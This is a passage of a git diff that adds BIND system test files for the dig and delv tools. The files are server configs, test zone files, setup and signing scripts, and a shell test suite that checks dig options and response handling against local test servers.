+rm -f ./dig.out.nn.* +rm -f ./host.out.test* +rm -f ./ns*/managed-keys.bind* +rm -f ./ns*/named.lock +rm -f ./ns2/dsset-example. +rm -f ./ns2/example.db ./ns2/K* ./ns2/keyid ./ns2/keydata +rm -f ./nslookup.out.test* +rm -f ./yamlget.out.* +rm -f ./nsupdate.out.test* diff --git a/bin/tests/system/digdelv/ns1/named.conf.in b/bin/tests/system/digdelv/ns1/named.conf.in new file mode 100644 index 0000000..df552bd --- /dev/null +++ b/bin/tests/system/digdelv/ns1/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + notify yes; + dnssec-validation no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/digdelv/ns1/root.db b/bin/tests/system/digdelv/ns1/root.db new file mode 100644 index 0000000..b43cc40 --- /dev/null +++ b/bin/tests/system/digdelv/ns1/root.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +a.root-servers.nil. AAAA fd92:7065:b8e:ffff::1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 +ns2.example. AAAA fd92:7065:b8e:ffff::2 diff --git a/bin/tests/system/digdelv/ns2/example.db.in b/bin/tests/system/digdelv/ns2/example.db.in new file mode 100644 index 0000000..c711049 --- /dev/null +++ b/bin/tests/system/digdelv/ns2/example.db.in @@ -0,0 +1,51 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns2 AAAA fd92:7065:b8e:ffff::2 +ns3 A 10.53.0.3 +ns3 AAAA fd92:7065:b8e:ffff::3 + +a A 10.0.0.1 +a AAAA fd92:7065:b8e:ffff::1 +b A 10.0.0.2 +b AAAA fd92:7065:b8e:ffff::2 +c A 10.0.0.3 +c AAAA fd92:7065:b8e:ffff::3 +d A 10.0.0.0 +d AAAA fd92:7065:b8e:ffff:: + +xn--caf-dma A 10.1.2.3 + +foo TXT "testing" +foo A 10.0.1.0 +foo SSHFP 2 1 123456789abcdef67890123456789abcdef67890 + +; TTL of 3 weeks +weeks 1814400 A 10.53.0.2 +; TTL of 3 days +days 259200 A 10.53.0.2 +; TTL of 3 hours +hours 10800 A 10.53.0.2 +;TTL of 45 minutes +minutes 2700 A 10.53.0.2 +;TTL of 45 seconds +seconds 45 A 10.53.0.2 diff --git a/bin/tests/system/digdelv/ns2/named.conf.in b/bin/tests/system/digdelv/ns2/named.conf.in new file mode 100644 index 0000000..1391b73 --- /dev/null +++ b/bin/tests/system/digdelv/ns2/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/digdelv/ns2/sign.sh b/bin/tests/system/digdelv/ns2/sign.sh new file mode 100644 index 0000000..41dacd6 --- /dev/null +++ b/bin/tests/system/digdelv/ns2/sign.sh @@ -0,0 +1,29 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +ksk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone example.) + +cp example.db.in example.db + +"$SIGNER" -Sz -f example.db -o example example.db.in > /dev/null 2>&1 + +keyfile_to_key_id "$ksk" > keyid +grep -Ev '^;' < "$ksk.key" | cut -f 7- -d ' ' > keydata + +keyfile_to_initial_keys "$ksk" > ../ns3/anchor.dnskey +keyfile_to_initial_ds "$ksk" > ../ns3/anchor.ds diff --git a/bin/tests/system/digdelv/ns3/named.conf.in b/bin/tests/system/digdelv/ns3/named.conf.in new file mode 100644 index 0000000..a13747b --- /dev/null +++ b/bin/tests/system/digdelv/ns3/named.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3 dscp 1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + recursion yes; + dnssec-validation no; + server-id "ns3"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/digdelv/prereq.sh b/bin/tests/system/digdelv/prereq.sh new file mode 100644 index 0000000..8f5a385 --- /dev/null +++ b/bin/tests/system/digdelv/prereq.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/digdelv/setup.sh b/bin/tests/system/digdelv/setup.sh new file mode 100644 index 0000000..b259e1b --- /dev/null +++ b/bin/tests/system/digdelv/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +cd ns2 && $SHELL sign.sh diff --git a/bin/tests/system/digdelv/tests.sh b/bin/tests/system/digdelv/tests.sh new file mode 100644 index 0000000..470f230 --- /dev/null +++ b/bin/tests/system/digdelv/tests.sh @@ -0,0 +1,1347 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=0 + +sendcmd() { + "$PERL" "$SYSTEMTESTTOP/send.pl" "${1}" "$EXTRAPORT1" +} + +dig_with_opts() { + "$DIG" -p "$PORT" "$@" +} + +mdig_with_opts() { + "$MDIG" -p "$PORT" "$@" +} + +# Check if response in file $1 has the correct TTL range. +# The response record must have RRtype $2 and class IN (CLASS1). +# Maximum TTL is given by $3. This works in most cases where TTL is +# the second word on the line. TTL position can be adjusted with +# setting the position $4, but that requires updating this function. +check_ttl_range() { + file=$1 + pos=$4 + + case "$pos" in + "3") + awk -v rrtype="$2" -v ttl="$3" '($4 == "IN" || $4 == "CLASS1" ) && $5 == rrtype { if ($3 <= ttl) { ok=1 } } END { exit(ok?0:1) }' < $file + ;; + *) + awk -v rrtype="$2" -v ttl="$3" '($3 == "IN" || $3 == "CLASS1" ) && $4 == rrtype { if ($2 <= ttl) { ok=1 } } END { exit(ok?0:1) }' < $file + ;; + esac + + result=$? + [ $result -eq 0 ] || echo_i "ttl check failed" + return $result +} + +# using delv insecure mode as not testing dnssec here +delv_with_opts() { + "$DELV" +noroot -p "$PORT" "$@" +} + +KEYID="$(cat ns2/keyid)" +KEYDATA="$(< ns2/keydata sed -e 's/+/[+]/g')" +NOSPLIT="$(< ns2/keydata sed -e 's/+/[+]/g' -e 's/ //g')" + +HAS_PYYAML=0 +if [ -n "$PYTHON" ] ; then + $PYTHON -c "import yaml" 2> /dev/null && HAS_PYYAML=1 +fi + +# +# test whether ans7/ans.pl will be able to send a UPDATE response. +# if it can't, we will log that below. +# +if "$PERL" -e 'use Net::DNS; use Net::DNS::Packet; my $p = new Net::DNS::Packet; $p->header->opcode(5);' > /dev/null 2>&1 +then + checkupdate=1 +else + checkupdate=0 +fi + +if [ -x "$NSLOOKUP" -a $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check nslookup handles UPDATE response ($n)" + ret=0 + "$NSLOOKUP" -q=CNAME "-port=$PORT" foo.bar 10.53.0.7 > nslookup.out.test$n 2>&1 && ret=1 + grep "Opcode mismatch" nslookup.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +fi + +if [ -x "$HOST" -a $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check host handles UPDATE response ($n)" + ret=0 + "$HOST" -t CNAME -p $PORT foo.bar 10.53.0.7 > host.out.test$n 2>&1 && ret=1 + grep "Opcode mismatch" host.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +fi + +if [ -x "$NSUPDATE" -a $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check nsupdate handles UPDATE response to QUERY ($n)" + ret=0 + res=0 + $NSUPDATE << EOF > nsupdate.out.test$n 2>&1 || res=$? +server 10.53.0.7 ${PORT} +add x.example.com 300 in a 1.2.3.4 +send +EOF + test $res -eq 1 || ret=1 + grep "invalid OPCODE in response to SOA query" nsupdate.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +fi + +if [ -x "$DIG" ] ; then + + if [ $checkupdate -eq 1 ] ; then + + n=$((n+1)) + echo_i "check dig handles UPDATE response ($n)" + ret=0 + dig_with_opts @10.53.0.7 cname foo.bar > dig.out.test$n 2>&1 && ret=1 + grep "Opcode mismatch" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "Skipped UPDATE handling test" + fi + + n=$((n+1)) + echo_i "checking dig short form works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +short a a.example > dig.out.test$n || ret=1 + test "$(wc -l < dig.out.test$n)" -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig split width works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +split=4 -t sshfp foo.example > dig.out.test$n || ret=1 + grep " 9ABC DEF6 7890 " < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SSHFP" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +unknownformat works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +unknownformat a a.example > dig.out.test$n || ret=1 + grep "CLASS1[ ][ ]*TYPE1[ ][ ]*\\\\# 4 0A000001" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "TYPE1" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig with reverse lookup works ($n)" + ret=0 + dig_with_opts @10.53.0.3 -x 127.0.0.1 > dig.out.test$n 2>&1 || ret=1 + # doesn't matter if has answer + grep -i "127\\.in-addr\\.arpa\\." < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 86400 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig over TCP works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 a a.example > dig.out.test$n || ret=1 + grep "10\\.0\\.0\\.1$" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +multi +norrcomments works for DNSKEY (when default is rrcomments)($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" dig.out.test$n > /dev/null && ret=1 + check_ttl_range dig.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +multi +norrcomments works for SOA (when default is rrcomments)($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t SOA example > dig.out.test$n || ret=1 + grep "; serial" dig.out.test$n > /dev/null && ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +rrcomments works for DNSKEY($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +rrcomments works for DNSKEY ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +nosplit works($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +nosplit DNSKEY example > dig.out.test$n || ret=1 + grep "$NOSPLIT" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +rrcomments works($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep -q "$KEYDATA ; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID\$" < dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig multi flag is local($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +nomulti example +nomulti > dig.out.nn.$n || ret=1 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +multi example +nomulti > dig.out.mn.$n || ret=1 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +nomulti example +multi > dig.out.nm.$n || ret=1 + dig_with_opts +tcp @10.53.0.3 -t DNSKEY example +multi example +multi > dig.out.mm.$n || ret=1 + lcnn=$(wc -l < dig.out.nn.$n) + lcmn=$(wc -l < dig.out.mn.$n) + lcnm=$(wc -l < dig.out.nm.$n) + lcmm=$(wc -l < dig.out.mm.$n) + test "$lcmm" -ge "$lcnm" || ret=1 + test "$lcmm" -ge "$lcmn" || ret=1 + test "$lcnm" -ge "$lcnn" || ret=1 + test "$lcmn" -ge "$lcnn" || ret=1 + check_ttl_range dig.out.nn.$n "DNSKEY" 300 || ret=1 + check_ttl_range dig.out.mn.$n "DNSKEY" 300 || ret=1 + check_ttl_range dig.out.nm.$n "DNSKEY" 300 || ret=1 + check_ttl_range dig.out.mm.$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +noheader-only works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +noheader-only A example > dig.out.test$n || ret=1 + grep "Got answer:" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +short +rrcomments works($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > dig.out.test$n || ret=1 + grep -q "$KEYDATA ; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID\$" < dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +header-only works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +header-only example > dig.out.test$n || ret=1 + grep "^;; flags: qr rd; QUERY: 0, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + grep "^;; QUESTION SECTION:" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +raflag works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +raflag +qr example > dig.out.test$n || ret=1 + grep "^;; flags: rd ra ad; QUERY: 1, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + grep "^;; flags: qr rd ra; QUERY: 1, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +tcflag works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +tcflag +qr example > dig.out.test$n || ret=1 + grep "^;; flags: tc rd ad; QUERY: 1, ANSWER: 0" < dig.out.test$n > /dev/null || ret=1 + grep "^;; flags: qr rd ra; QUERY: 1, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +header-only works (with class and type set) ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +header-only -c IN -t A example > dig.out.test$n || ret=1 + grep "^;; flags: qr rd; QUERY: 0, ANSWER: 0," < dig.out.test$n > /dev/null || ret=1 + grep "^;; QUESTION SECTION:" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +zflag works, and that BIND properly ignores it ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.3 +zflag +qr A example > dig.out.test$n || ret=1 + sed -n '/Sending:/,/Got answer:/p' dig.out.test$n | grep "^;; flags: rd ad; MBZ: 0x4;" > /dev/null || ret=1 + sed -n '/Got answer:/,/AUTHORITY SECTION:/p' dig.out.test$n | grep "^;; flags: qr rd ra; QUERY: 1" > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +qr +ednsopt=08 does not cause an INSIST failure ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=08 +qr a a.example > dig.out.test$n || ret=1 + grep "INSIST" < dig.out.test$n > /dev/null && ret=1 + grep "FORMERR" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +ttlunits works ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +ttlunits A weeks.example > dig.out.test$n || ret=1 + grep "^weeks.example. 3w" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A days.example > dig.out.test$n || ret=1 + grep "^days.example. 3d" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A hours.example > dig.out.test$n || ret=1 + grep "^hours.example. 3h" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A minutes.example > dig.out.test$n || ret=1 + grep "^minutes.example. 45m" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +ttlunits A seconds.example > dig.out.test$n || ret=1 + grep "^seconds.example. 45s" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig respects precedence of options with +ttlunits ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +ttlunits +nottlid A weeks.example > dig.out.test$n || ret=1 + grep "^weeks.example. IN" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +nottlid +ttlunits A weeks.example > dig.out.test$n || ret=1 + grep "^weeks.example. 3w" < dig.out.test$n > /dev/null || ret=1 + dig_with_opts +tcp @10.53.0.2 +nottlid +nottlunits A weeks.example > dig.out.test$n || ret=1 + grep "^weeks.example. 1814400" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig preserves origin on TCP retries ($n)" + ret=0 + # Ask ans4 to still accept TCP connections, but not respond to queries + echo "//" | sendcmd 10.53.0.4 + dig_with_opts -d +tcp @10.53.0.4 +retry=1 +time=1 +domain=bar foo > dig.out.test$n 2>&1 && ret=1 + test "$(grep -c "trying origin bar" dig.out.test$n)" -eq 2 || ret=1 + grep "using root origin" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig -6 -4 ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 -4 -6 A a.example > dig.out.test$n 2>&1 && ret=1 + grep "only one of -4 and -6 allowed" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig @IPv6addr -4 A a.example ($n)" + if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null + then + ret=0 + dig_with_opts +tcp @fd92:7065:b8e:ffff::2 -4 A a.example > dig.out.test$n 2>&1 && ret=1 + grep "address family not supported" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "IPv6 unavailable; skipping" + fi + + n=$((n+1)) + echo_i "checking dig @IPv4addr -6 +mapped A a.example ($n)" + if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null && [ "$(uname -s)" != "OpenBSD" ] + then + ret=0 + dig_with_opts +tcp @10.53.0.2 -6 +mapped A a.example > dig.out.test$n 2>&1 || ret=1 + grep "SERVER: ::ffff:10.53.0.2#$PORT" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "IPv6 or IPv4-to-IPv6 mapping unavailable; skipping" + fi + + n=$((n+1)) + echo_i "checking dig +tcp @IPv4addr -6 +nomapped A a.example ($n)" + if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null + then + ret=0 + dig_with_opts +tcp @10.53.0.2 -6 +nomapped A a.example > dig.out.test$n 2>&1 || ret=1 + grep "SERVER: ::ffff:10.53.0.2#$PORT" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "IPv6 unavailable; skipping" + fi + n=$((n+1)) + + echo_i "checking dig +notcp @IPv4addr -6 +nomapped A a.example ($n)" + if testsock6 fd92:7065:b8e:ffff::2 2>/dev/null + then + ret=0 + dig_with_opts +notcp @10.53.0.2 -6 +nomapped A a.example > dig.out.test$n 2>&1 || ret=1 + grep "SERVER: ::ffff:10.53.0.2#$PORT" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "IPv6 unavailable; skipping" + fi + + n=$((n+1)) + echo_i "checking dig +subnet ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +subnet=127.0.0.1 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "CLIENT-SUBNET: 127.0.0.1/32/0" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +subnet +subnet ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +subnet=127.0.0.0 +subnet=127.0.0.1 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "CLIENT-SUBNET: 127.0.0.1/32/0" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +subnet with various prefix lengths ($n)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24; do + dig_with_opts +tcp @10.53.0.2 +subnet=255.255.255.255/$i A a.example > dig.out.$i.test$n 2>&1 || ret=1 + case $i in + 1|9|17) octet=128 ;; + 2|10|18) octet=192 ;; + 3|11|19) octet=224 ;; + 4|12|20) octet=240 ;; + 5|13|21) octet=248 ;; + 6|14|22) octet=252 ;; + 7|15|23) octet=254 ;; + 8|16|24) octet=255 ;; + esac + case $i in + 1|2|3|4|5|6|7|8) addr="${octet}.0.0.0";; + 9|10|11|12|13|14|15|16) addr="255.${octet}.0.0";; + 17|18|19|20|21|22|23|24) addr="255.255.${octet}.0" ;; + esac + grep "FORMERR" < dig.out.$i.test$n > /dev/null && ret=1 + grep "CLIENT-SUBNET: $addr/$i/0" < dig.out.$i.test$n > /dev/null || ret=1 + check_ttl_range dig.out.$i.test$n "A" 300 || ret=1 + done + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +subnet=0/0 ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +subnet=0/0 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1 + grep "CLIENT-SUBNET: 0.0.0.0/0/0" < dig.out.test$n > /dev/null || ret=1 + grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +subnet=0 ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +subnet=0 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1 + grep "CLIENT-SUBNET: 0.0.0.0/0/0" < dig.out.test$n > /dev/null || ret=1 + grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +subnet=::/0 